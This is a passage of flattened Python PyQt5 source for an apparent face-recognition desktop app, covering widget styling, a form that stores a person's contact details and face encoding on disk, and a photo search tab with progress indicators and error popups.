self.plainTextEdit_333.setFont(font1)
self.plainTextEdit_333.setPlaceholderText("Email")
self.plainTextEdit_444 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_444.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_444.setGeometry(QtCore.QRect(800, 170+100, 491, 231))
self.plainTextEdit_444.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_444.setFont(font1)
self.plainTextEdit_444.setPlaceholderText("Residence Address")
self.lab = QtWidgets.QLabel(self.tab_2)
self.lab.setEnabled(True)
self.lab.setObjectName("card")
self.lab.setGeometry(QtCore.QRect(910, 20, 470, 320))
self.lab.setStyleSheet("#card{background-color:rgba(0, 133, 57,0.2);border:1px solid green;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2 = QtWidgets.QLabel(self.tab_2)
self.lab2.setEnabled(True)
self.lab2.setObjectName("card2")
self.lab2.setGeometry(QtCore.QRect(910, 348, 470, 315))
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
self.frame = QtWidgets.QFrame(self.tab_2)
self.frame.setObjectName("frame")
self.frame.setGeometry(QtCore.QRect(0, 0, 0,0))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setStyleSheet("#frame{background:transparent}")
self.frame_2 = QtWidgets.QFrame(self.frame)
self.frame_2.setObjectName(u"frame_2")
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.label = QtWidgets.QLabel(self.frame_2)
self.label.setObjectName("label")
self.frame2 = QtWidgets.QFrame(self.tab_2)
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.frame2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame2.setObjectName("frame2")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
font_noinfo = QtGui.QFont(fontstr)
font_noinfo.setPointSize(14)
font_noinfo.setBold(False)
font_noinfo.setItalic(False)
font_noinfo.setWeight(50)
self.label_noimg = QtWidgets.QLabel(self.lab)
self.label_noimg.setGeometry(QtCore.QRect(180,20,350,200))
self.label_noimg.setObjectName("label_noimg")
self.label_noimg.setText("NO IMAGE")
self.label_noimg.setStyleSheet("#label_noimg{background:transparent;color:rgba(0,255,68,0.6)}")
self.label_noimg.setFont(font_noinfo)
self.shadow_lab_ = QtWidgets.QGraphicsDropShadowEffect(self.label_noimg,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.label_noimg.setGraphicsEffect(self.shadow_lab_)
self.label_noimg2 = QtWidgets.QLabel(self.lab)
self.label_noimg2.setGeometry(QtCore.QRect(175,60,350,200))
self.label_noimg2.setObjectName("label_noimg")
self.label_noimg2.setText("AVAILABLE")
self.label_noimg2.setStyleSheet("#label_noimg{background:transparent;color:rgba(0,255,68,0.6)}")
self.label_noimg2.setFont(font_noinfo)
self.shadow_lab_2 = QtWidgets.QGraphicsDropShadowEffect(self.label_noimg2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.label_noimg2.setGraphicsEffect(self.shadow_lab_2)
self.label_noinfo = QtWidgets.QLabel(self.lab2)
self.label_noinfo.setGeometry(QtCore.QRect(140,0,300,300))
self.label_noinfo.setObjectName("label_noinfo")
self.label_noinfo.setText("NO INFORMATIONS")
self.label_noinfo.setStyleSheet("#label_noinfo{background:transparent;color:rgba(0,255,255,0.6)}")
self.label_noinfo.setFont(font_noinfo)
self.shadow_frame2_ = QtWidgets.QGraphicsDropShadowEffect(self.label_noinfo,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.label_noinfo.setGraphicsEffect(self.shadow_frame2_)
self.label_err_face = QtWidgets.QLabel(self.lab)
self.label_err_face.setObjectName("label_err_face")
self.label_err_face.setText("")
self.label_err_face.setStyleSheet("#label_err_face{background:transparent;color:rgba(255, 28, 51,0.9)}")
self.label_err_face.setFont(font_noinfo)
self.popup_icon_err_shadow = QtWidgets.QGraphicsDropShadowEffect(self.label_err_face,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.label_err_face.setGraphicsEffect(self.popup_icon_err_shadow)
self.popup_icon_err = QtWidgets.QFrame(self.lab)
self.popup_icon_err.setObjectName("popup_icon_err")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent}")
self.popup_icon_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_icon_err_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_err,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_err.setGraphicsEffect(self.popup_icon_err_shadow)
self.frame_err = QtWidgets.QFrame(self.tab_2)
self.frame_err.setObjectName(u"frame_err")
self.frame_err.setStyleSheet(u"#frame_err{background:transparent}")
self.frame_err.setGeometry(QtCore.QRect(1030, 500, 411, 51))
self.frame_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.shadow_frame_err = QtWidgets.QGraphicsDropShadowEffect(self.frame_err,blurRadius=30,xOffset=1,yOffset=1,color=QtGui.QColor(222, 18, 21))
self.frame_err.setGraphicsEffect(self.shadow_frame_err)
self.alert_err = QtWidgets.QFrame(self.tab_2)
self.alert_err.setObjectName(u"alert_err")
self.alert_err.setStyleSheet(u"#alert_err{background:transparent}")
self.alert_err.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.alert_err.setFrameShadow(QtWidgets.QFrame.Raised)
self.label_err = QtWidgets.QLabel(self.frame_err)
self.label_err.setObjectName("label_err")
self.label_err.setStyleSheet("#label_err{background:transparent;color:rgba(255, 28, 51,0.9)}")
self.frame_22 = QtWidgets.QFrame(self.frame2)
self.frame_22.setObjectName(u"frame_22")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_22.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_22.setFrameShadow(QtWidgets.QFrame.Raised)
self.label2 = QtWidgets.QLabel(self.frame_22)
self.label2.setGeometry(QtCore.QRect(75, 80, 100, 50))
self.label2.setStyleSheet("#label2{background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:0, stop:0 rgba(0, 0, 0, 0), stop:1 rgba(23, 65, 66, 200));\n"
"font: 25pt \"Roboto Slab\";\n"
"color: rgb(0, 221, 255);}")
self.label2.setObjectName("label2")
self.shadow_label2 = QtWidgets.QGraphicsDropShadowEffect(self.label2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.label2.setGraphicsEffect(self.shadow_label2)
font = QtGui.QFont(fontstr)
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.upload = QtWidgets.QPushButton(self.tab_2)
self.upload.setEnabled(True)
self.upload.setGeometry(QtCore.QRect(270, 20, 355, 350))
self.upload.setObjectName("upload")
self.upload.setStyleSheet("#upload{background:transparent;border-image:url('./src/images/face1.png');}")
self.upload.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.upload.setMouseTracking(True)
self.shadow2 = QtWidgets.QGraphicsDropShadowEffect(self.upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.upload.setGraphicsEffect(self.shadow2)
self.upload.clicked.connect(self.img_select)
self.upload2 = QtWidgets.QPushButton(self.tab_2)
self.upload2.setEnabled(True)
self.upload2.setGeometry(QtCore.QRect(480, 496, 120, 50))
self.upload2.setText("Search")
self.upload2.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.upload2.setMouseTracking(True)
self.upload2.setFocusPolicy(QtCore.Qt.NoFocus)
self.upload2.setLayoutDirection(QtCore.Qt.LeftToRight)
self.upload2.setAutoFillBackground(False)
self.upload2.setFont(font)
self.upload2.setStyleSheet("#upload2:hover {background: rgba(0, 252, 150, 0.17);}#upload2{background: rgba(0, 252, 139, 0.1);padding:5px;color:rgb(0, 252, 160);border: 1px solid rgb(0, 252, 160);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(0, 252, 139);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.upload2,blurRadius=20,xOffset=1,yOffset=1)
self.upload2.setGraphicsEffect(self.shadow1)
self.upload2.clicked.connect(self.prc)
self.upload2.setInputMethodHints(QtCore.Qt.ImhNone)
self.upload2.setShortcut("")
self.upload2.setCheckable(False)
self.upload2.setObjectName("upload2")
self.remove = QtWidgets.QPushButton(self.tab_2)
self.remove.setEnabled(True)
self.remove.setGeometry(QtCore.QRect(325, 496, 120, 50))
self.remove.setText("Reload")
self.remove.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.remove.setMouseTracking(True)
self.remove.setFocusPolicy(QtCore.Qt.NoFocus)
self.remove.setLayoutDirection(QtCore.Qt.LeftToRight)
self.remove.setAutoFillBackground(False)
self.remove.setFont(font)
self.remove.setStyleSheet("#remove:hover {background: rgba(255, 106, 0, 0.17);}#remove{background: rgba(255, 106, 0, 0.1);padding:5px;color:rgb(255, 106, 0);border: 1px solid rgb(255, 106, 0);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(255, 106, 0);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.remove,blurRadius=20,xOffset=1,yOffset=1)
self.remove.setGraphicsEffect(self.shadow1)
self.remove.clicked.connect(self.reload)
self.remove.setInputMethodHints(QtCore.Qt.ImhNone)
self.remove.setShortcut("")
self.remove.setCheckable(False)
self.remove.setObjectName("remove")
self.pushButton = QtWidgets.QPushButton(self.tab)
self.pushButton.setEnabled(True)
self.pushButton.setGeometry(QtCore.QRect(590, 580, 90, 35))
self.pushButton.setText("Add")
self.pushButton.clicked.connect(self.add)
self.pushButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pushButton.setMouseTracking(True)
self.pushButton.setFocusPolicy(QtCore.Qt.NoFocus)
self.pushButton.setLayoutDirection(QtCore.Qt.LeftToRight)
self.pushButton.setAutoFillBackground(False)
self.pushButton.setFont(font)
self.pushButton.setStyleSheet("#pushButton:hover {background: rgba(0, 214, 252, 0.17);}#pushButton{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-top-right-radius:10px;border-bottom-left-radius:10px;border-color:rgb(20, 182, 216);}")
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.pushButton,blurRadius=20,xOffset=1,yOffset=1)
self.pushButton.setGraphicsEffect(self.shadow1)
self.pushButton.setInputMethodHints(QtCore.Qt.ImhNone)
self.pushButton.setShortcut("")
self.pushButton.setCheckable(False)
self.pushButton.setObjectName("pushButton")
self.popup = QtWidgets.QFrame(self.tab_2)
self.popup.setObjectName("popup")
self.popup.setStyleSheet("#popup{background:transparent}")
self.popup.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_remove = QtWidgets.QPushButton(self.popup)
self.popup_remove.setObjectName("popup_remove")
self.popup_remove.setStyleSheet("#popup_remove{background:transparent}")
self.popup_icon_frame = QtWidgets.QFrame(self.popup)
self.popup_icon_frame.setObjectName("popup_icon_frame")
self.popup_icon_frame.setStyleSheet("#popup_icon_frame{background:transparent}")
self.popup_icon_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_text_frame = QtWidgets.QLabel(self.popup)
self.popup_text_frame.setObjectName("popup_text_frame")
self.popup_text_frame.setStyleSheet("#popup_text_frame{background:transparent}")
self.popup_error_input = QtWidgets.QFrame(self.tab)
self.popup_error_input.setObjectName("popup_error_input")
self.popup_error_input.setStyleSheet("#popup_error_input{background:transparent}")
self.popup_remove_input = QtWidgets.QPushButton(self.popup_error_input)
self.popup_remove_input.setObjectName("popup_remove_input")
self.popup_remove_input.setStyleSheet("#popup_remove_input{background:transparent}")
self.popup_icon_frame_input = QtWidgets.QFrame(self.popup_error_input)
self.popup_icon_frame_input.setObjectName("popup_icon_frame_input")
self.popup_icon_frame_input.setStyleSheet("#popup_icon_frame_input{background:transparent}")
self.popup_icon_frame_input.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.popup_icon_frame_input.setFrameShadow(QtWidgets.QFrame.Raised)
self.popup_text_frame_input = QtWidgets.QLabel(self.popup_error_input)
self.popup_text_frame_input.setObjectName("popup_text_frame_input")
self.popup_text_frame_input.setStyleSheet("#popup_text_frame_input{background:transparent}")
self.tabWidget.addTab(self.tab, "")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def img_select_2(self):
global path_2
path_2 = None
file_select = QtWidgets.QFileDialog()
filters = "Image files (*.jpg *.png *jpeg)"
path_2 = QtWidgets.QFileDialog.getOpenFileName(file_select,"Select an image","./",filters)
if path_2 != None and path_2[0] != "":
self.id_upload.setGeometry(QtCore.QRect(100, 120, 100, 100))
self.id_upload.setStyleSheet(str("#id_upload{border-image:url('")+path_2[0]+str("');border-radius:5px}"))
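# Collect the form fields, encode the uploaded ID photo with face_recognition, and store the encoding, the image and data.json under ./data/<name>/.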
def add(self):
input_error = False
first_name = self.plainTextEdit_4.text()
last_name = self.plainTextEdit_2.text()
day = self.plainTextEdit_5.text()
month = self.plainTextEdit_9.text()
year = self.plainTextEdit_55.text()
country = self.plainTextEdit_3.text()
city = self.plainTextEdit_6.text()
gender = self.plainTextEdit.text()
job = self.plainTextEdit_10.text()
work_location = self.plainTextEdit_11.text()
num_1 = self.plainTextEdit_111.text()
num_2 = self.plainTextEdit_222.text()
email = self.plainTextEdit_333.text()
addr = self.plainTextEdit_444.text()
info_list = [first_name,last_name,day,month,year,country,city,gender,job,work_location,num_1,num_2,email,addr]
# mark the form as incomplete if any field is empty or no ID image was selected
input_error = any(str(info) == "" for info in info_list) or path_2 is None or path_2[0] == ""
if input_error:
self.popup_error_input_func()
else:
img = Image.open(path_2[0])
input1 = frc.load_image_file(path_2[0])
face = frc.face_locations(input1,model="hog")
enc = frc.face_encodings(input1,face)
jdict = {"name":str(first_name)+" "+str(last_name),"dob":str(day)+"."+str(month)+"."+str(year),
"cc":str(country)+"/"+str(city),"gen":gender,"job":job,"phone_n1":num_1,"phone_n2":num_2,"job_loc":work_location,"addr":addr,"email":email}
res = json.dumps(jdict)
name = str(first_name)+" "+str(last_name)
os.mkdir(f"./data/{name}")
np.save(f"./data/{name}/enc.npy",enc)
img.save(f"./data/{name}/{name}.jpg")
with open(f"./data/{name}/data.json","w") as f:
f.write(res)
f.close()
def popup_error_input_func(self):
self.popup_error_input.show()
blured_elements = [self.tab_11,self.plainTextEdit,self.plainTextEdit_2,self.plainTextEdit_3,self.plainTextEdit_4,self.plainTextEdit_5,
self.plainTextEdit_6,self.plainTextEdit_9,self.plainTextEdit_10,self.plainTextEdit_11,self.plainTextEdit_55,self.plainTextEdit_111,
self.plainTextEdit_222,self.plainTextEdit_333,self.plainTextEdit_444,self.pushButton,self.id_upload,self.gen,self.contact]
for elements in blured_elements:
elements.setEnabled(False)
self.blur_effect_input = QtWidgets.QGraphicsBlurEffect(elements)
self.blur_effect_input.setBlurRadius(7)
elements.setGraphicsEffect(self.blur_effect_input)
self.popup_error_input.setGeometry(QtCore.QRect(500,200,300,150))
self.popup_error_input.setStyleSheet("#popup_error_input{background-color:rgba(110, 0, 0,0.3);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.popup_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_error_input,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_error_input.setGraphicsEffect(self.popup_shadow)
self.popup_remove_input.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.popup_remove_input.setMouseTracking(True)
self.popup_remove_input.setFocusPolicy(QtCore.Qt.NoFocus)
self.popup_remove_input.setLayoutDirection(QtCore.Qt.LeftToRight)
self.popup_remove_input.setAutoFillBackground(False)
self.popup_remove_input.clicked.connect(self.popup_remove_func_input)
self.popup_remove_input.setInputMethodHints(QtCore.Qt.ImhNone)
self.popup_remove_input.setShortcut("")
self.popup_remove_input.setCheckable(False)
self.popup_icon_frame_input.setGeometry(QtCore.QRect(110,10,80,80))
self.popup_icon_frame_input.setStyleSheet("#popup_icon_frame_input{background:transparent;border-image:url('./src/images/image(4).png')}")
self.popup_icon_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_frame_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_frame_input.setGraphicsEffect(self.popup_icon_frame_shadow)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
font_popup = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
popup_font = QtGui.QFont(font_popup)
popup_font.setPointSize(10)
popup_font.setBold(False)
popup_font.setItalic(False)
popup_font.setWeight(30)
self.popup_text_frame_input.setGeometry(QtCore.QRect(40,80,300,50))
self.popup_text_frame_input.setStyleSheet("#popup_text_frame_input{background:transparent;color:rgb(255, 28, 51)}")
self.popup_text_frame_input.setText("Informations uncompleted")
self.popup_text_frame_input.setFont(popup_font)
self.popup_text_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_text_frame_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_text_frame.setGraphicsEffect(self.popup_text_frame_shadow)
self.popup_remove_input.setGeometry(QtCore.QRect(282,8,10,10))
self.popup_remove_input.setStyleSheet("#popup_remove_input{background:transparent;border-image:url('./src/images/image(6).png')}")
self.popup_remove_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_remove_input,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_remove_input.setGraphicsEffect(self.popup_remove_shadow)
def popup_remove_func_input(self):
self.popup_error_input.hide()
blured_elements = [self.tab_11,self.plainTextEdit,self.plainTextEdit_2,self.plainTextEdit_3,self.plainTextEdit_4,self.plainTextEdit_5,self.plainTextEdit_6,
self.plainTextEdit_9,self.plainTextEdit_10,self.plainTextEdit_11,self.plainTextEdit_55,self.plainTextEdit_111,
self.plainTextEdit_222,self.plainTextEdit_333,self.plainTextEdit_444,self.pushButton,self.id_upload,self.gen,self.contact]
for elements in blured_elements:
elements.setEnabled(True)
self.blur_effect_input.setEnabled(False)
elements.setGraphicsEffect(self.blur_effect_input)
self.pushButton.setEnabled(True)
def load(self,value):
self.frame.setGeometry(QtCore.QRect(1030, 50, 231, 231))
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.label.setStyleSheet("#label{background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:0, stop:0 rgba(0, 0, 0, 0), stop:1 rgba(255, 255, 255, 255));\n"
"font: 25pt \"Roboto Slab\";\n"
"color: rgb(0, 255, 8);}")
self.label.setGeometry(QtCore.QRect(75, 80, 100, 50))
self.shadow_label = QtWidgets.QGraphicsDropShadowEffect(self.label,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 8))
self.label.setGraphicsEffect(self.shadow_label)
self.value = value
self.styleSheet = "#frame{background-color: qconicalgradient(cx:0.5, cy:0.5, angle:0, stop:{p1} rgb(0, 255, 98), stop:{p2} rgba(16, 145, 196, 20));border-radius:115;}"
self.prog = (self.value)/100
self.p1 = str(self.prog-0.0001)
self.p2 = str(self.prog)
self.newStylesheet = self.styleSheet.replace("{p1}", self.p1).replace("{p2}", self.p2)
self.label_noimg2.setText("")
self.label_noimg.setText("")
self.frame_2.setGeometry(QtCore.QRect(5, 6, 221, 221))
self.frame_2.setStyleSheet(u"#frame_2{border-radius:109px;background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0.994318, stop:1 rgba(23, 65, 66, 200));}")
self.frame.setStyleSheet(self.newStylesheet)
self.label.setText(f"{value} %")
def load_2(self,value1):
self.value1 = value1
self.styleSheet1 = "#frame2{background-color: qconicalgradient(cx:0.5, cy:0.5, angle:0, stop:{p11} rgb(0, 221, 255), stop:{p22} rgba(16, 145, 196, 20));border-radius:115;}"
self.prog1 = (self.value1)/100
self.p11 = str(self.prog1-0.0001)
self.p22 = str(self.prog1)
self.newStylesheet1 = self.styleSheet1.replace("{p11}", self.p11).replace("{p22}", self.p22)
self.frame2.setStyleSheet(self.newStylesheet1)
self.frame_22.setStyleSheet(u"#frame_22{border-radius:109px;background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0.994318, stop:1 rgba(23, 65, 66, 200));}")
self.frame_22.setGeometry(QtCore.QRect(5, 6, 221, 221))
self.label2.setText(f"{value1} %")
if self.value1 == 100:
time.sleep(1)
self.value1 = 0
def img_select(self):
global path
file_select = QtWidgets.QFileDialog()
filters = "Image files (*.jpg *.png *.jpeg)"
path = None
path = QtWidgets.QFileDialog.getOpenFileName(file_select,"Select an image","./",filters)
if path is not None and path[0] != "":
img = QtGui.QImage(path[0])
img_w = img.width()
img_h = img.height()
w = 230
if img_w > 550:
img_w = 700
w = 100
if img_h > 440:
img_h = 400
self.upload.setGeometry(QtCore.QRect(w, 50, img_w, img_h))
self.upload.setStyleSheet("#upload{border-image:url(" + path[0] + ");}")
else:
print("Please select an image")
def prc(self):
if path is not None and path[0] != "":
self.sig = External()
self.sig.signal.connect(self.load)
self.sig1 = External()
self.sig1.signal_.connect(self.load_2)
self.sig.start()
if self.frame.visibleRegion().isEmpty() and self.frame_2.visibleRegion().isEmpty():
self.frame.show()
self.frame_2.show()
Thread(target = self.process).start()
else:
self.popup_error()
def popup_error(self):
self.popup.show()
blured_elements = [self.upload2,self.frame,self.frame2,self.upload,self.remove,self.lab,self.lab2,self.label_err,self.tab_22]
for elements in blured_elements:
self.blur_effect = QtWidgets.QGraphicsBlurEffect(elements)
self.blur_effect.setBlurRadius(7)
elements.setGraphicsEffect(self.blur_effect)
self.upload2.setEnabled(False)
self.remove.setEnabled(False)
self.upload.setEnabled(False)
self.popup.setGeometry(QtCore.QRect(500,200,300,150))
self.popup.setStyleSheet("#popup{background-color:rgba(110, 0, 0,0.3);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.popup_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup.setGraphicsEffect(self.popup_shadow)
self.popup_remove.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.popup_remove.setMouseTracking(True)
self.popup_remove.setFocusPolicy(QtCore.Qt.NoFocus)
self.popup_remove.setLayoutDirection(QtCore.Qt.LeftToRight)
self.popup_remove.setAutoFillBackground(False)
self.popup_remove.clicked.connect(self.popup_remove_func)
self.popup_remove.setInputMethodHints(QtCore.Qt.ImhNone)
self.popup_remove.setShortcut("")
self.popup_remove.setCheckable(False)
self.popup_icon_frame.setGeometry(QtCore.QRect(110,10,80,80))
self.popup_icon_frame.setStyleSheet("#popup_icon_frame{background:transparent;border-image:url('./src/images/image(4).png')}")
self.popup_icon_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_icon_frame,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_icon_frame.setGraphicsEffect(self.popup_icon_frame_shadow)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
font_popup = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
popup_font = QtGui.QFont(font_popup)
popup_font.setPointSize(10)
popup_font.setBold(False)
popup_font.setItalic(False)
popup_font.setWeight(30)
self.popup_text_frame.setGeometry(QtCore.QRect(47,80,300,50))
self.popup_text_frame.setStyleSheet("#popup_text_frame{background:transparent;color:rgb(255, 28, 51)}")
self.popup_text_frame.setText("Please select an image")
self.popup_text_frame.setFont(popup_font)
self.popup_text_frame_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_text_frame,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_text_frame.setGraphicsEffect(self.popup_text_frame_shadow)
self.popup_remove.setGeometry(QtCore.QRect(282,8,10,10))
self.popup_remove.setStyleSheet("#popup_remove{background:transparent;border-image:url('./src/images/image(6).png')}")
self.popup_remove_shadow = QtWidgets.QGraphicsDropShadowEffect(self.popup_remove,blurRadius=5,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.popup_remove.setGraphicsEffect(self.popup_remove_shadow)
def popup_remove_func(self):
self.popup.hide()
blured_elements = [self.upload2,self.frame,self.frame2,self.upload,self.remove,self.lab,self.lab2,self.label_err,self.tab_22]
for elements in blured_elements:
self.blur_effect.setEnabled(False)
elements.setGraphicsEffect(self.blur_effect)
self.shadow1 = QtWidgets.QGraphicsDropShadowEffect(self.upload2,blurRadius=20,xOffset=1,yOffset=1)
self.upload2.setGraphicsEffect(self.shadow1)
self.shadow1_ = QtWidgets.QGraphicsDropShadowEffect(self.remove,blurRadius=20,xOffset=1,yOffset=1)
self.remove.setGraphicsEffect(self.shadow1_)
self.shadow2 = QtWidgets.QGraphicsDropShadowEffect(self.upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.upload.setGraphicsEffect(self.shadow2)
self.shadow_frame = QtWidgets.QGraphicsDropShadowEffect(self.frame,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.frame.setGraphicsEffect(self.shadow_frame)
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.upload2.setEnabled(True)
self.remove.setEnabled(True)
self.upload.setEnabled(True)
def process(self):
self.sig1.start()
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font = QtGui.QFont(fontstr)
font.setPointSize(14)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
style = '''#upload{background-size:img_w img_h;background-image:url('./src/images/id.jpeg');}'''
self.label_err_face.setText("")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
process.load(path[0])
self.label_err.setText("")
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.start_error = process.start(path[0])
if self.frame2.visibleRegion().isEmpty() and self.frame_22.visibleRegion().isEmpty():
self.frame2.show()
self.frame_22.show()
if self.start_error == False:
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect()
self.shadow_lab_red.setEnabled(False)
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{border-image:url('./src/images/id2_.png');}")
process.search(path[0])
err_id = process.id_card()
time.sleep(0.5)
if err_id == False:
if not self.frame.visibleRegion().isEmpty() and not self.frame_22.visibleRegion().isEmpty() and not self.frame2.visibleRegion().isEmpty() and not self.frame_2.visibleRegion().isEmpty():
self.frame2.hide()
self.frame_22.hide()
self.frame.hide()
self.frame_2.hide()
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
self.label.setText("")
self.label2.setText("")
self.alert_err.setGeometry(QtCore.QRect(1070, 370, 150, 150))
self.label_err.setGeometry(QtCore.QRect(0,0,400,50))
self.label_err.setText("FACE DOESN'T EXIST")
self.label_noinfo.setText("")
self.lab2.setStyleSheet("#card2{background-color:rgba(110, 0, 0,0.2);border:1px solid red;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
